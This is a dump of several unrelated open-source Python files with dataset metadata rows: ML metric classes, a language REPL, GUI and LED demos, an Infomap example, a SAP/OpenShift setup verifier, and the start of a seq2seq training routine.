correct = pred_topk.eq(label.view(1, -1).expand_as(pred_topk))
self.sum_metric += float(correct.reshape(-1).float().sum(0, keepdim=True).numpy())
self.num_inst += label.shape[0]
'''
=== E N D O F C L A S S A C C U R A C Y ===
'''
'''
=== S T A R T O F C L A S S L O S S ===
[About]
EvalMetric class for creating a loss score. The class acts as a `dummy estimate`
as no further calculations are required for the loss. Instead it is primarily
used to easily/directly print the loss.
[Init Args]
- name: String for the variable name. Defaults to `loss`.
[Methods]
- __init__ : Class initialiser
- update : Function to update scores.
'''
class Loss(EvalMetric):
def __init__(self, name='loss'):
super(Loss, self).__init__(name)
def update(self, preds, labels, losses, lr, batch_size):
assert losses is not None, "Loss undefined."
for loss in losses:
self.sum_metric += float(loss.numpy().sum())
self.num_inst += 1
'''
=== E N D O F C L A S S L O S S ===
'''
'''
=== S T A R T O F C L A S S B A T C H S I Z E ===
[About]
EvalMetric class for batch-size used. The class acts as a `dummy estimate`
as no further calculations are required for the size of the batch. Instead it is primarily
used to easily/directly print the batch size.
[Init Args]
- name: String for the variable name. Defaults to `batch-size`.
[Methods]
- __init__ : Class initialiser
- update : Function used for updates.
'''
class BatchSize(EvalMetric):
def __init__(self, name='batch-size'):
super(BatchSize, self).__init__(name)
def update(self, preds, labels, losses, lrs, batch_sizes):
assert batch_sizes is not None, "Batch size undefined."
self.sum_metric = batch_sizes
self.num_inst = 1
'''
=== E N D O F C L A S S B A T C H S I Z E ===
'''
'''
=== S T A R T O F C L A S S L E A R N I N G R A T E ===
[About]
EvalMetric class for learning rate used. The class acts as a `dummy estimate`
as no further calculations are required for the size of the lr. Instead it is primarily
used to easily/directly print the learning rate.
[Init Args]
- name: String for the variable name. Defaults to `lr`.
[Methods]
- __init__ : Class initialiser
- update : Function used for updates.
'''
class LearningRate(EvalMetric):
def __init__(self, name='lr'):
super(LearningRate, self).__init__(name)
def update(self, preds, labels, losses, lrs, batch_sizes):
assert lrs is not None, "Learning rate undefined."
self.sum_metric = lrs[-1]
self.num_inst = 1
'''
=== E N D O F C L A S S L E A R N I N G R A T E ===
'''
if __name__ == "__main__":
import torch
# Test Accuracy
predicts = [torch.from_numpy(np.array([[0.7, 0.3], [0, 1.], [0.4, 0.6]]))]
labels = [torch.from_numpy(np.array([ 0, 1, 1 ]))]
losses = [torch.from_numpy(np.array([ 0.3, 0.4, 0.5 ]))]
logging.getLogger().setLevel(logging.DEBUG)
logging.debug("input pred: {}".format(predicts))
logging.debug("input label: {}".format(labels))
logging.debug("input loss: {}".format(labels))
acc = Accuracy()
acc.update(preds=predicts, labels=labels, losses=losses, lr=0, batch_size=1)
logging.info(acc.get())
# Test MetricList
metrics = MetricList(Loss(name="ce-loss"),
Accuracy(topk=1, name="acc-top1"),
Accuracy(topk=2, name="acc-top2"),
)
metrics.update(preds=predicts, labels=labels, losses=losses, lr=0, batch_size=1)
logging.info("------------")
logging.info(metrics.get())
acc.get_name_value()
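# --- Hedged addition (not part of the original test block) ---
# A quick top-2 sanity check: with the 2-class predictions above, the true label is
# always among the two highest scores, so (assuming EvalMetric.get() reports the
# running sum over the instance count) a top-2 Accuracy metric should come out at 1.0.
acc_top2 = Accuracy(topk=2, name="acc-top2-demo")
acc_top2.update(preds=predicts, labels=labels, losses=losses, lr=0, batch_size=1)
logging.info(acc_top2.get())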
| 30.356436
| 103
| 0.593064
| 4,506
| 0.489889
| 0
| 0
| 0
| 0
| 0
| 0
| 4,130
| 0.449011
|
12fe867458db015f3b4f5fd16c3634fc1b9c4dae
| 3,018
|
py
|
Python
|
poly/repl.py
|
jdanford/poly
|
4f3a242dbb54fb68375a310af943be759588f459
|
[
"0BSD"
] | null | null | null |
poly/repl.py
|
jdanford/poly
|
4f3a242dbb54fb68375a310af943be759588f459
|
[
"0BSD"
] | null | null | null |
poly/repl.py
|
jdanford/poly
|
4f3a242dbb54fb68375a310af943be759588f459
|
[
"0BSD"
] | null | null | null |
import sys
from string import whitespace
from clint.textui import puts, indent, colored
from poly.common import *
from poly.node import *
def repl_main(args):
repl = Repl("repl")
repl.run()
class UndefinedCommandError(PolyError):
def __init__(self, command):
self.message = "Undefined command '{}'".format(command)
class Repl:
def __init__(self, name, in_prompt=None, out_prompt=None):
self.node = Node(name)
if in_prompt is None:
in_prompt = ">> "
self.in_prompt = in_prompt
if out_prompt is None:
out_prompt = "\n" + " " * len(in_prompt)
self.out_prompt = out_prompt
try:
self.node.load_module("prelude.poly", "")
except ModuleError as e:
self.print_error(e)
def run(self):
self.print_banner("Poly 0.0")
while True:
s, is_command = self.get_input()
if is_command:
try:
exit = self.handle_command(s)
except UndefinedCommandError as e:
self.print_error(e)
exit = False
if exit:
break
else:
continue
try:
expr = self.node.read(s)
self.eval_and_print(expr)
except PolyError as e:
self.print_error(e)
def eval_and_print(self, expr0):
expr1 = self.node.eval(expr0)
self.print_result(expr1)
self.node.env.table["$"] = expr1
def handle_command(self, cmd):
if cmd in ["q", "quit"]:
return True
elif cmd[0] == " ":
self.print_warning(cmd[1:])
else:
raise UndefinedCommandError(cmd)
return False
def get_input(self):
while True:
try:
prompt = self.in_prompt
puts(prompt, newline=False)
s = input().strip()
if empty_space(s):
continue
elif s[0] == ":":
return s[1:], True
else:
return s, False
except (EOFError, KeyboardInterrupt):
puts()
return "quit", True
def print_banner(self, s, width=72):
line = "-" * width
puts(line)
puts(s)
puts(line + "\n")
def print_result(self, expr):
prompt = colored.blue(self.out_prompt)
puts(prompt + str(expr) + "\n")
def print_str(self, s):
puts(s)
def print_warning(self, s):
sign = colored.yellow("Warning: ")
puts(sign + s + "\n")
def print_error(self, e):
sign = colored.red("Error: ")
puts(sign + e.message + "\n")
def empty_space(s):
    if len(s) == 0:
        return True
    for c in s:
        if c not in whitespace:
            return False
    return True
if __name__ == "__main__":
repl_main(sys.argv[1:])
| 23.578125
| 63
| 0.503313
| 2,609
| 0.86448
| 0
| 0
| 0
| 0
| 0
| 0
| 141
| 0.04672
|
12fea94d07f9c12bbbce2e89b9de91f96defafac
| 1,330
|
py
|
Python
|
resources/mgltools_x86_64Linux2_1.5.6/lib/python2.5/site-packages/Pmw/Pmw_1_3/demos/SelectionDialog.py
|
J-E-J-S/aaRS-Pipeline
|
43f59f28ab06e4b16328c3bc405cdddc6e69ac44
|
[
"MIT"
] | 3
|
2017-09-26T03:09:14.000Z
|
2022-03-20T11:12:34.000Z
|
resources/mgltools_x86_64Linux2_1.5.6/lib/python2.5/site-packages/Pmw/Pmw_1_3/demos/SelectionDialog.py
|
J-E-J-S/aaRS-Pipeline
|
43f59f28ab06e4b16328c3bc405cdddc6e69ac44
|
[
"MIT"
] | null | null | null |
resources/mgltools_x86_64Linux2_1.5.6/lib/python2.5/site-packages/Pmw/Pmw_1_3/demos/SelectionDialog.py
|
J-E-J-S/aaRS-Pipeline
|
43f59f28ab06e4b16328c3bc405cdddc6e69ac44
|
[
"MIT"
] | 2
|
2019-10-05T23:02:41.000Z
|
2020-06-25T20:21:02.000Z
|
title = 'Pmw.SelectionDialog demonstration'
# Import Pmw from this directory tree.
import sys
sys.path[:0] = ['../../..']
import Tkinter
import Pmw
class Demo:
def __init__(self, parent):
# Create the dialog.
self.dialog = Pmw.SelectionDialog(parent,
title = 'My SelectionDialog',
buttons = ('OK', 'Cancel'),
defaultbutton = 'OK',
scrolledlist_labelpos = 'n',
label_text = 'What do you think of Pmw?',
scrolledlist_items = ('Cool man', 'Cool', 'Good', 'Bad', 'Gross'),
command = self.execute)
self.dialog.withdraw()
# Create button to launch the dialog.
w = Tkinter.Button(parent, text = 'Show selection dialog',
command = self.dialog.activate)
w.pack(padx = 8, pady = 8)
def execute(self, result):
sels = self.dialog.getcurselection()
if len(sels) == 0:
print 'You clicked on', result, '(no selection)'
else:
print 'You clicked on', result, sels[0]
self.dialog.deactivate(result)
######################################################################
# Create demo in root window for testing.
if __name__ == '__main__':
root = Tkinter.Tk()
Pmw.initialise(root)
root.title(title)
exitButton = Tkinter.Button(root, text = 'Exit', command = root.destroy)
exitButton.pack(side = 'bottom')
widget = Demo(root)
root.mainloop()
| 27.708333
| 76
| 0.619549
| 806
| 0.606015
| 0
| 0
| 0
| 0
| 0
| 0
| 446
| 0.335338
|
12ff9748e2c126e4060dc274380a9e865c327195
| 778
|
py
|
Python
|
py3plex/algorithms/infomap/examples/python/example-simple.py
|
awesome-archive/Py3plex
|
a099acb992441c1630208ba13694acb8e2a38895
|
[
"BSD-3-Clause"
] | 1
|
2020-02-20T07:37:02.000Z
|
2020-02-20T07:37:02.000Z
|
py3plex/algorithms/infomap/examples/python/example-simple.py
|
awesome-archive/Py3plex
|
a099acb992441c1630208ba13694acb8e2a38895
|
[
"BSD-3-Clause"
] | null | null | null |
py3plex/algorithms/infomap/examples/python/example-simple.py
|
awesome-archive/Py3plex
|
a099acb992441c1630208ba13694acb8e2a38895
|
[
"BSD-3-Clause"
] | null | null | null |
from infomap import infomap
infomapWrapper = infomap.Infomap("--two-level")
# Add weight as an optional third argument
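# For example (illustrative only; assumes the bindings accept a numeric weight):
# infomapWrapper.addLink(0, 1, 2.0)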
infomapWrapper.addLink(0, 1)
infomapWrapper.addLink(0, 2)
infomapWrapper.addLink(0, 3)
infomapWrapper.addLink(1, 0)
infomapWrapper.addLink(1, 2)
infomapWrapper.addLink(2, 1)
infomapWrapper.addLink(2, 0)
infomapWrapper.addLink(3, 0)
infomapWrapper.addLink(3, 4)
infomapWrapper.addLink(3, 5)
infomapWrapper.addLink(4, 3)
infomapWrapper.addLink(4, 5)
infomapWrapper.addLink(5, 4)
infomapWrapper.addLink(5, 3)
infomapWrapper.run()
tree = infomapWrapper.tree
print("Found %d modules with codelength: %f" % (tree.numTopModules(), tree.codelength()))
print("\n#node module")
for node in tree.leafIter():
print("%d %d" % (node.physIndex, node.moduleIndex()))
| 25.096774
| 89
| 0.75964
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 116
| 0.1491
|
12ffa5ef886269b64400e6ff0dbf8d65f1d35e0b
| 305
|
py
|
Python
|
api/tests.py
|
everett-toews/metaslacker
|
ec4bf3c4b39aa16b5ae46a0c3e732b8b9cb2cf72
|
[
"MIT"
] | 90
|
2015-09-17T00:38:59.000Z
|
2021-05-29T02:36:42.000Z
|
api/tests.py
|
everett-toews/metaslacker
|
ec4bf3c4b39aa16b5ae46a0c3e732b8b9cb2cf72
|
[
"MIT"
] | null | null | null |
api/tests.py
|
everett-toews/metaslacker
|
ec4bf3c4b39aa16b5ae46a0c3e732b8b9cb2cf72
|
[
"MIT"
] | 10
|
2016-02-23T16:28:32.000Z
|
2021-06-01T20:24:31.000Z
|
import unittest
class MainTestCase(unittest.TestCase):
def test_two_and_two(self):
four = 2 + 2
self.assertEqual(four, 4)
self.assertNotEqual(four, 5)
self.assertNotEqual(four, 6)
self.assertNotEqual(four, 22)
if __name__ == '__main__':
unittest.main()
| 20.333333
| 38
| 0.642623
| 238
| 0.780328
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 0.032787
|
12ffe639dabbddd0482e5d8aa0dc1908fa825881
| 18,741
|
py
|
Python
|
tools/modules/verify.py
|
andscha/containerization-for-sap-s4hana
|
337df7b3b515dad9c243eae6b58ee95bf749782a
|
[
"Apache-2.0"
] | 6
|
2020-12-16T13:12:42.000Z
|
2022-02-09T17:38:47.000Z
|
tools/modules/verify.py
|
andscha/containerization-for-sap-s4hana
|
337df7b3b515dad9c243eae6b58ee95bf749782a
|
[
"Apache-2.0"
] | 5
|
2021-04-07T07:19:02.000Z
|
2022-03-31T08:40:01.000Z
|
tools/modules/verify.py
|
andscha/containerization-for-sap-s4hana
|
337df7b3b515dad9c243eae6b58ee95bf749782a
|
[
"Apache-2.0"
] | 7
|
2021-05-21T04:36:44.000Z
|
2022-03-31T07:36:48.000Z
|
# ------------------------------------------------------------------------
# Copyright 2020, 2021 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
""" Verify settings in configuration YAML file (helper functions) """
# Global modules
# None
# Local modules
from modules.command import (
CmdShell,
CmdSsh
)
from modules.constants import getConstants
from modules.exceptions import RpmFileNotFoundException
from modules.ocp import ocLogin
from modules.tools import (
refSystemIsStandard,
areContainerMemResourcesValid,
getRpmFileForPackage,
strBold,
getHdbCopySshCommand
)
# Functions for formatting the output
def showMsgOk(text):
""" print text with header """
print("[Ok ] " + text)
def showMsgErr(text):
""" print text with header """
print('[' + strBold('Error') + '] ' + text)
def showMsgInd(text):
""" print text with header """
print("[.....] " + text)
# Classes
class Verify():
""" Verify various configuration settings """
def __init__(self, ctx):
self._ctx = ctx
self._cmdSshNfs = CmdSsh(ctx, ctx.cf.nfs.host.name, ctx.cr.nfs.user,
reuseCon=False)
self._cmdSshNws4 = CmdSsh(ctx, ctx.cf.refsys.nws4.host.name, ctx.cr.refsys.nws4.sidadm,
reuseCon=False)
self._cmdSshHdb = CmdSsh(ctx, ctx.cf.refsys.hdb.host.name, ctx.cr.refsys.hdb.sidadm,
reuseCon=False)
# Public methods
def verify(self):
""" Verify various configuration settings """
success = True
success = self._verifyOcp() and success
success = self._verifyImages() and success
success = self._verifyNws4() and success
success = self._verifyHdb() and success
success = self._verifyNfs() and success
success = self._verifySapSystem() and success
success = self.verifyNfsToHdbSshConnection() and success
return success
def verifyNfsToHdbSshConnection(self, doPrint=True):
""" Verify SSH connection from NFS host to HDB host """
hdbUser = self._ctx.cr.refsys.hdb.sidadm
hdbHost = self._ctx.cf.refsys.hdb.host
testSsh, testSshSecrets = getHdbCopySshCommand(self._ctx, withLogin=True, reuseCon=False)
# set dummy command
testSsh = testSsh + " true"
result = self._cmdSshNfs.run(testSsh, testSshSecrets)
success = result.rc == 0
if doPrint:
nfsUser = self._ctx.cr.nfs.user
nfsHost = self._ctx.cf.nfs.host.name
if success:
showMsgOk(f"SSH connection to HDB host '{hdbHost.name}' "
f"from NFS host '{nfsHost}' was successful.")
else:
showMsgErr(f"Cannot establish ssh connection '{nfsUser.name}@{nfsHost}"
f" → '{hdbUser.name}@{hdbHost.ip}' ('{hdbUser.name}@{hdbHost.name}').")
showMsgInd(f"Error message: '{result.out}'")
showMsgInd("Check the ssh connection"
f" '{nfsUser.name}@{nfsHost}' → '{hdbUser.name}@{hdbHost.ip}'.")
return success
# Private methods
def _verifyOcp(self):
""" Verify OCP settings """
# pylint: disable=too-many-statements
def isDomainNameValid(loginAnsw):
return 'no such host' not in loginAnsw
def isCredentialsValid(loginAnsw):
condFail1 = (loginAnsw.startswith('Login failed')
and 'Verify you have provided correct credentials' in loginAnsw)
condFail2 = not (loginAnsw.startswith('Logged into')
or loginAnsw.startswith('Login successful'))
return not (condFail1 or condFail2)
def isProjectValid(project):
# Assumes that an 'oc login' has been performed beforehand
cmd = f'oc get project {project} -o custom-columns=NAME:.metadata.name --no-headers'
# The command behaves as follows:
# - If the project exists in the OpenShift cluster its name is printed to stdout.
# - If it does not exist nothing is printed to stdout and an error message is printed
# to stderr
return project in CmdShell().run(cmd).out
def areResourcesValid(ocp, containerType):
return areContainerMemResourcesValid(ocp, containerType)
def isSecretExisting(secret):
# Assumes that an 'oc login' has been performed beforehand
cmd = f'oc describe secret {secret}'
out = CmdShell().run(cmd).err
return not out.startswith('Error from server')
def verifySetup(ocp, loginAnsw):
success = True
if isDomainNameValid(loginAnsw):
showMsgOk("OCP domain name is valid.")
if isCredentialsValid(loginAnsw):
showMsgOk("OCP user and password are valid.")
if isProjectValid(ocp.project):
showMsgOk("OCP project is valid.")
else:
showMsgErr(f"OCP project '{ocp.project}' does not exist.")
success = False
else:
showMsgErr(f"OCP user '{user.name}' and/or password are invalid.")
success = False
else:
showMsgErr(f"OCP domain name '{ocp.domain}' is invalid.")
success = False
return success
def verifyResources(ocp):
success = True
for containerType in self._ctx.config.getContainerFlavors():
if containerType == 'init':
continue
if areResourcesValid(ocp, containerType):
showMsgOk("OCP memory resources for container type "
f"'{containerType}' are valid.")
else:
showMsgErr(f"OCP memory limit for container type '{containerType}' "
f"is less than the value specified for requested memory.")
success = False
return success
def verifySecret(ocp):
success = True
if not refSystemIsStandard(self._ctx):
secret = ocp.containers.di.secret
if secret:
if isSecretExisting(secret):
showMsgOk(f"OCP secret '{secret}' exists.")
else:
showMsgErr(f"Specified OCP secret '{secret}' "
"was not found in OCP cluster.")
showMsgInd("Make sure the secret exists and is "
"created in the right project.")
success = False
else:
showMsgErr("Reference system is a distributed system.")
showMsgInd("You must specify the name of an OCP secret in the config.yaml file")
showMsgInd("containing the information about the "
"SAP HANA DB user and password.")
success = False
return success
ocp = self._ctx.cf.ocp
user = self._ctx.cr.ocp.user
success = verifySetup(ocp, ocLogin(self._ctx, user))
success = success and verifyResources(ocp)
success = success and verifySecret(ocp)
return success
def _verifyImages(self):
""" verify Settings for images """
def _isRpmFileForPackageAvailable(packageName, path):
try:
getRpmFileForPackage(packageName, path)
return True
except RpmFileNotFoundException as exp:
print(exp.errorText)
return False
def _getImageTypes(ctx):
return list(ctx.cf.images.__dict__)
success = True
defaultPackagesDir = getConstants().defaultPackagesDir
for flavor in _getImageTypes(self._ctx):
if flavor == "init":
continue
packages = getattr(self._ctx.cf.images, flavor).packages
for package in packages:
if package.dnfInstallable:
showMsgOk(f"Package {package.packageName} installable via dnf install.")
else:
if _isRpmFileForPackageAvailable(package.packageName, defaultPackagesDir):
showMsgOk(f"Package {package.packageName} installable via rpm.")
else:
showMsgErr(f"Package {package.packageName} not found "
"in {defaultPackagesDir}.")
success = False
return success
def _verifyNfs(self):
""" Verify NFS settings """
nfs = self._ctx.cf.nfs
user = self._ctx.cr.nfs.user
success = True
if self._isHostNameValid(self._cmdSshNfs):
showMsgOk("NFS host is valid.")
if self._isUserValid(self._cmdSshNfs):
showMsgOk("NFS user is valid.")
else:
showMsgErr(f"NFS user '{user.name}' is invalid "
f"or ssh is not set up correctly.")
showMsgInd(f"Check first the existence of '{user.name}' on '{nfs.host.name}'.")
showMsgInd(f"If exists, check the ssh connection by executing: "
f"ssh {user.name}@{nfs.host.name}")
success = False
else:
showMsgErr(f"NFS host '{nfs.host.name}' is invalid.")
success = False
return success
def _verifyNws4(self):
""" Verify settings for reference system component 'nws4' """
return self._verifyRefSys('nws4', self._cmdSshNws4)
def _verifyHdb(self):
""" Verify settings for reference system component 'hdb' """
success = self._verifyRefSys('hdb', self._cmdSshNws4)
if success:
if self._isHdbBaseDirValid():
showMsgOk("HDB base directory is valid.")
else:
showMsgErr(f"HDB base directory '{self._ctx.cf.refsys.hdb.base}' is invalid.")
success = False
return success
def _verifyRefSys(self, component, cmdSsh):
""" Verify settings for given component' """
compUp = component.upper()
sidU = getattr(self._ctx.cf.refsys, component).sidU
hostname = getattr(self._ctx.cf.refsys, component).host.name
user = getattr(self._ctx.cr.refsys, component).sidadm
success = True
if self._isHostNameValid(cmdSsh):
showMsgOk(f"{compUp} host is valid.")
if self._isUserValid(cmdSsh):
showMsgOk(f"{compUp} user is valid.")
if self._isSidInUsrSapServices(cmdSsh, sidU):
showMsgOk(f"{compUp} SAP system ID is valid.")
else:
showMsgErr(f"{compUp} SAP system ID is invalid.")
success = False
else:
showMsgErr(f"{compUp} user '{user.name}' is invalid "
f"or ssh is not set up correctly.")
showMsgInd(f"Check first the existence of '{user.name}' on '{hostname}'.")
showMsgInd(f"If exists, check the ssh connection by executing: "
f"ssh {user.name}@{hostname}")
success = False
else:
showMsgErr(f"{compUp} host '{hostname}' is invalid.")
success = False
return success
def _verifySapSystem(self):
""" Verify SAP system setup """
success = True
if refSystemIsStandard(self._ctx):
if not self._ctx.cf.refsys.nws4.host.name == self._ctx.cf.refsys.hdb.host.name:
success = False
showMsgErr(f"The HANADB database '{self._ctx.cf.refsys.hdb.sidU}' "
"must run on the same host as the NWS4 SAP System.")
if not self._isHdbSidInDefaultPfl():
showMsgErr("You must not use a different HANADB SAP System "
f"than specified for the NWS4 SAP System '{self._ctx.cf.refsys.nws4.sidU}'.")
success = False
return success
def _isHostNameValid(self, cmdSsh):
out = self._checkSshLogin(cmdSsh)
return 'Could not resolve hostname' not in out
def _isUserValid(self, cmdSsh):
out = self._checkSshLogin(cmdSsh)
return 'Permission denied' not in out and 'Connection reset' not in out
def _checkSshLogin(self, cmdSsh):
return cmdSsh.run('true').err
def _isSidInUsrSapServices(self, cmdSsh, sidU):
out = cmdSsh.run(f' grep {sidU} /usr/sap/sapservices | wc -l').err
return not out.startswith('0')
def _isDirValid(self, cmdSsh, directory):
out = cmdSsh.run(f' ls {directory}').err
return 'No such file or directory' not in out
def _isHdbBaseDirValid(self):
out = self._cmdSshHdb.run(f' ls {self._ctx.cf.refsys.hdb.base}').out
return 'data' in out and 'log' in out and 'shared' in out
def _isHdbSidInDefaultPfl(self):
defaultPfl = f'/usr/sap/{self._ctx.cf.refsys.nws4.sidU}/SYS/profile/DEFAULT.PFL'
out = self._cmdSshNws4.run(f' grep dbs/hdb/dbname {defaultPfl}').out
return self._ctx.cf.refsys.hdb.sidU in out
class VerifyOcp():
""" Verify various ocp settings """
def __init__(self, ctx):
self._ctx = ctx
ocLogin(ctx, ctx.cr.ocp.admin)
self._workerNodes = CmdShell().run(
'oc get nodes'
+ ' --selector="node-role.kubernetes.io/worker"'
+ " -o template --template"
+ " '{{range .items}}{{.metadata.name}}{{"+r'"\n"'+"}}{{end}}'"
).out.split()
# Public methods
def verify(self):
""" Verify various ocp settings """
success = True
success = self._verifySccForProject() and success
success = self._verifyOcpServiceAccount() and success
if not self._workerNodes:
showMsgErr("Could not retrieve list of worker nodes.")
showMsgInd("SELinux and pid limit settings cannot be verified!")
success = False
else:
success = self._verifySeLinux() and success
success = self._verifyPidLimit() and success
return success
# Private methods
def _runSshJumpCmd(self, worker, cmd):
ctx = self._ctx
innerSshCmd = 'ssh'
if ctx.cr.ocp.helper.user.sshid:
innerSshCmd += f' -i {ctx.cr.ocp.helper.user.sshid}'
innerSshCmd += ' -o StrictHostKeyChecking=no'
innerSshCmd += f' core@{worker} {cmd}'
helperHost = ctx.cf.ocp.helper.host
helperUser = ctx.cr.ocp.helper.user
res = CmdSsh(ctx, helperHost.name, helperUser, reuseCon=False).run(innerSshCmd)
rval = res.out
if res.rc != 0:
showMsgErr(f"Could not execute SSH command on worker node '{worker}'"
f" as user '{helperUser.name}' on helper node '{helperHost.name}'")
showMsgInd(f"({res.err})")
rval = 'SSH CONNECT ERROR'
return rval
def _verifySccForProject(self):
ocp = self._ctx.cf.ocp
out = CmdShell().run(
'oc adm policy who-can use scc anyuid'
" -o template --template='{{range .groups}}{{.}}{{"+r'"\n"'+"}}{{end}}'"
).out.split()
if f'system:serviceaccounts:{ocp.project}' in out:
showMsgOk("Security Context Constraint 'anyuid' is valid.")
return True
showMsgErr(f"Project '{ocp.project}' does not have "
"the 'anyuid' Security Context Constraint permission.")
showMsgInd("Logon as kube:admin and execute:")
showMsgInd(" oc adm policy add-scc-to-group anyuid"
f' "system:serviceaccounts:{ocp.project}"\n')
return False
def _verifyOcpServiceAccount(self):
ocp = self._ctx.cf.ocp
out = CmdShell().run(
'oc adm policy who-can use scc hostmount-anyuid'
" -o template --template='{{range .users}}{{.}}{{"+r'"\n"'+"}}{{end}}'"
).out.split()
if f'system:serviceaccount:{ocp.project}:{ocp.project}-sa' in out:
showMsgOk("Security Context Constraint 'hostmount-anyuid' is valid.")
return True
showMsgErr(f"Service account {ocp.project}-sa does not have "
"the 'hostmount-anyuid' Security Context Constraint.")
showMsgInd("Logon as kube:admin, create the service account and execute:")
showMsgInd(" oc adm policy add-scc-to-user hostmount-anyuid"
f' "system:serviceaccount:{ocp.project}:{ocp.project}-sa"\n')
return False
def _verifySeLinux(self):
success = True
for worker in self._workerNodes:
enforceState = self._runSshJumpCmd(worker, 'getenforce')
if enforceState in ('Permissive', 'Disabled'):
showMsgOk(f"SELinux setting for worker {worker} is valid.")
else:
showMsgErr(f"Invalid SELinux setting '{enforceState}' for worker {worker}.")
success = False
return success
def _verifyPidLimit(self):
success = True
for worker in self._workerNodes:
pidsLimit = self._runSshJumpCmd(worker, 'crio config | grep pids_limit')
pidsLimit = int(pidsLimit.split('=')[1])
if pidsLimit >= 8192:
showMsgOk(f"CRI-O pids_limit setting for worker {worker} is valid.")
else:
showMsgErr(f"CRI-O pids_limit setting for worker {worker} "
"is too low, must be >= 8192.")
success = False
return success
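# --- Hedged usage sketch (not part of the original module) ---
# The checks above are typically driven from a small tool entry point, roughly:
#
#   success = Verify(ctx).verify() and VerifyOcp(ctx).verify()
#   sys.exit(0 if success else 1)
#
# where `ctx` is the configuration/credentials context object assumed by both classes.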
| 38.561728
| 100
| 0.566138
| 17,182
| 0.916618
| 0
| 0
| 0
| 0
| 0
| 0
| 6,585
| 0.351294
|
4200fb28b1b5da3ed4576b7e698fb2853d8ef02a
| 1,060
|
py
|
Python
|
rainbow/rainbow.py
|
jaxzin/adafruit-voice-docker
|
8932e2432f56e795c4160dfeef8f61aa5a3da15a
|
[
"MIT"
] | null | null | null |
rainbow/rainbow.py
|
jaxzin/adafruit-voice-docker
|
8932e2432f56e795c4160dfeef8f61aa5a3da15a
|
[
"MIT"
] | null | null | null |
rainbow/rainbow.py
|
jaxzin/adafruit-voice-docker
|
8932e2432f56e795c4160dfeef8f61aa5a3da15a
|
[
"MIT"
] | null | null | null |
import time
import board
import adafruit_dotstar
import atexit
import signal
kill_now = False
DOTSTAR_DATA = board.D5
DOTSTAR_CLOCK = board.D6
dots = adafruit_dotstar.DotStar(DOTSTAR_CLOCK, DOTSTAR_DATA, 3, brightness=0.5)
def exit_handler(*args):
    # accept the (signum, frame) arguments passed by signal handlers as well
    global kill_now
    kill_now = True
    # turn off the pixel dots
    for i in range(3):
        dots[i] = (0, 0, 0)
    dots.show()
atexit.register(exit_handler)
signal.signal(signal.SIGINT, exit_handler)
signal.signal(signal.SIGTERM, exit_handler)
def wheel(pos):
# Input a value 0 to 255 to get a color value.
# The colours are a transition r - g - b - back to r.
if pos < 0 or pos > 255:
return (0, 0, 0)
if pos < 85:
return (255 - pos * 3, pos * 3, 0)
if pos < 170:
pos -= 85
return (0, 255 - pos * 3, pos * 3)
pos -= 170
return (pos * 3, 0, 255 - pos * 3)
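# Illustrative spot checks (not part of the original script) of the mapping above:
# wheel(0)   -> (255, 0, 0)  pure red
# wheel(85)  -> (0, 255, 0)  pure green
# wheel(170) -> (0, 0, 255)  pure blue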
while not kill_now:
for j in range(255):
for i in range(3):
rc_index = (i * 256 // 3) + j * 5
dots[i] = wheel(rc_index & 255)
dots.show()
time.sleep(0.01)
| 24.090909
| 79
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 124
| 0.116981
|
4201d4e01f67d6a8af781c7b4dac4cc684c59e89
| 117
|
py
|
Python
|
src/iranlowo/corpus/__init__.py
|
Niger-Volta-LTI/iranlowo
|
0046b61105ffadfff21dd8b37754b9d95177fbf8
|
[
"MIT"
] | 17
|
2019-07-05T20:30:35.000Z
|
2022-02-28T10:00:24.000Z
|
src/iranlowo/corpus/__init__.py
|
Olamyy/iranlowo
|
1feb123988a8afac3ac53c7acfb72df862c4bc18
|
[
"MIT"
] | 17
|
2019-07-06T09:10:10.000Z
|
2020-11-13T08:30:37.000Z
|
src/iranlowo/corpus/__init__.py
|
ruohoruotsi/iranlowo
|
0046b61105ffadfff21dd8b37754b9d95177fbf8
|
[
"MIT"
] | 7
|
2019-07-01T01:59:07.000Z
|
2020-11-27T17:12:46.000Z
|
from .corpus import Corpus, DirectoryCorpus
from .loaders import OweLoader, YorubaBlogCorpus, BBCCorpus, BibeliCorpus
| 58.5
| 73
| 0.854701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
4203e2556562a439641ccfc38f8f880faffaf2ad
| 6,054
|
py
|
Python
|
seq2seq.py
|
frozen86/SeqLite
|
7f83e6a4716d756a45b2801085ac6628379fbea2
|
[
"Apache-2.0"
] | 1
|
2018-05-10T01:40:55.000Z
|
2018-05-10T01:40:55.000Z
|
seq2seq.py
|
frozen86/SeqLite
|
7f83e6a4716d756a45b2801085ac6628379fbea2
|
[
"Apache-2.0"
] | null | null | null |
seq2seq.py
|
frozen86/SeqLite
|
7f83e6a4716d756a45b2801085ac6628379fbea2
|
[
"Apache-2.0"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import numpy as np
from masked_cross_entropy import *
from preprocess import *
from parameter import *
import time
# # Training
def train(input_batches, input_lengths, target_batches, target_lengths, encoder, decoder, encoder_optimizer, decoder_optimizer, criterion, max_length=MAX_LENGTH):
batch_size = BATCH_SIZE
clip = CLIP
# Zero gradients of both optimizers
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
loss = 0 # Added onto for each word
# Run through encoder
encoder_outputs, encoder_hidden = encoder(
input_batches, input_lengths, None)
# Initialize decoder input
decoder_input = torch.LongTensor([SOS_index] * batch_size)
# Use last (forward) hidden state from encoder
# encoder_hidden size: num_layers * num_directions(=2), batch, hidden_size
# decoder_hidden size: num_layers, batch, hidden_size
decoder_hidden = encoder_hidden[:decoder.n_layers]
# Find the max length
max_target_length = max(target_lengths)
# Initialize decoder output
all_decoder_outputs = torch.zeros(
max_target_length, batch_size, decoder.output_size)
# Move new Variables to CUDA
if USE_CUDA:
decoder_input = decoder_input.cuda()
all_decoder_outputs = all_decoder_outputs.cuda()
